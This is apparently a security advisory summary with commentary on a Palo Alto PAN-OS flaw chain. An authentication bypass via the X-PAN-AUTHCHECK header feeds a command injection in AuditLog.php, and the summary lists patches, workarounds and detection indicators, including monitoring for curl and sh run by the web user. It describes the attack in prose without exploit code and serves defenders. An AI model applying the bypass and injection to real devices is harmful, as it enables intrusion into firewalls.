Full Report
SSLVPN is essential protection for defenders. As a result, threat actors are constantly looking for bugs in it. This article describes and explains a vulnerability being used in an active campaign. They do this by doing some diffing on the changes. The first interesting diff they did was on the Nginx route configuration for /etc/nginx/conf/locations.conf. The changes were setting a bunch of proxy_headers to the empty string and one of them to 'on'. Most notably, the X-pan-AuthCheck header was now being set to on. The X-pan-AuthCheck header is used as part of an authentication check in uiEnvSetup.php. Authentication is entirely bypassed by providing this header and setting it to off. Hype! Once logged in an application like this, RCE is practically a feature. AuditLog.php has a fairly obvious command injection. However, they were not only sure where the actual input came from but just knew it had to do with user impersonation. After trying a bunch of endpoints, they eventually found one that triggered the command injection from the username parameter on the call. I personally liked the patch-diffing part of this article. As a defender of other companies, like this one, understanding what the vulnerability is and what you're up against is a requirement. So, I imagine so do a good amount of reverse engineering for these types of patches. Good work and knowledge sharing!
Analysis Summary
# Vulnerability: Palo Alto PAN-OS Auth Bypass and RCE Chain
## CVE Details
- **CVE ID:** CVE-2024-0012 (Authentication Bypass), CVE-2024-9474 (Privilege Escalation)
- **CVSS Score:** 9.3 (Critical) for CVE-2024-0012; 6.9 (Medium/High) for CVE-2024-9474
- **CWE:** CWE-288 (Authentication Bypass Using an Alternate Path), CWE-78 (OS Command Injection)
## Affected Systems
- **Products:** Palo Alto Networks PA-Series, VM-Series, and Panorama models.
- **Versions:** PAN-OS 10.2, 11.0, 11.1, and 11.2 (Specific maintenance releases vary; see remediation).
- **Configurations:** Systems with the **Management Web Interface** accessible to the internet.
## Vulnerability Description
This vulnerability is a chain of two flaws found in the PHP-based management interface:
1. **CVE-2024-0012:** An authentication bypass exists in the `uiEnvSetup.php` script (prepended to all requests via `php.ini`). The application checks the `X-PAN-AUTHCHECK` HTTP header; if set to `off`, it skips standard session validation. While Nginx normally strips or overrides this header, specific route configurations allowed attackers to pass this header through, gaining administrative access.
2. **CVE-2024-9474:** A command injection vulnerability in `AuditLog.php`. The application uses shell execution (backticks) to process user parameters. An authenticated (or bypassed) user can inject shell commands into the `user` parameter of certain API calls, leading to execution as the `web-backend` user (effectively RCE).
## Exploitation
- **Status:** Exploited in the wild.
- **Complexity:** Low.
- **Attack Vector:** Network (specifically targeting the Management Interface).
## Impact
- **Confidentiality:** High (Full access to device configuration and secrets).
- **Integrity:** High (Ability to modify firewall rules and system files).
- **Availability:** High (Ability to disable the appliance or disrupt traffic).
## Remediation
### Patches
Update to the following versions or later:
- PAN-OS 10.2.12-h2
- PAN-OS 11.0.6-h1
- PAN-OS 11.1.5-h1
- PAN-OS 11.2.4-h1
### Workarounds
- **Isolate Management Interface:** Immediately restrict access to the management web interface to only trusted internal IP addresses. Do not expose it to the public internet.
- **Apply Security Profile:** Use a "Threat Prevention" profile to block known exploitation patterns if traffic passes through another Palo Alto firewall.
## Detection
- **Indicators of Compromise:**
- Look for the presence of the `X-PAN-AUTHCHECK: off` header in web server logs (though logs may be manipulated).
- Check for unexpected files in `/var/appweb/htdocs/unauth/`.
- Monitor for processes spawned by the web server user (`www-data` or `web-backend`) executing shell commands (e.g., `uname`, `curl`, `sh`).
- **Tools:** Use the watchTowr Nuclei template to scan management interfaces for vulnerability.
## References
- Vendor Advisory (CVE-2024-0012): hxxps[://]security[.]paloaltonetworks[.]com/CVE-2024-0012
- Vendor Advisory (CVE-2024-9474): hxxps[://]security[.]paloaltonetworks[.]com/CVE-2024-9474
- Analysis by watchTowr Labs: hxxps[://]labs[.]watchtowr[.]com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/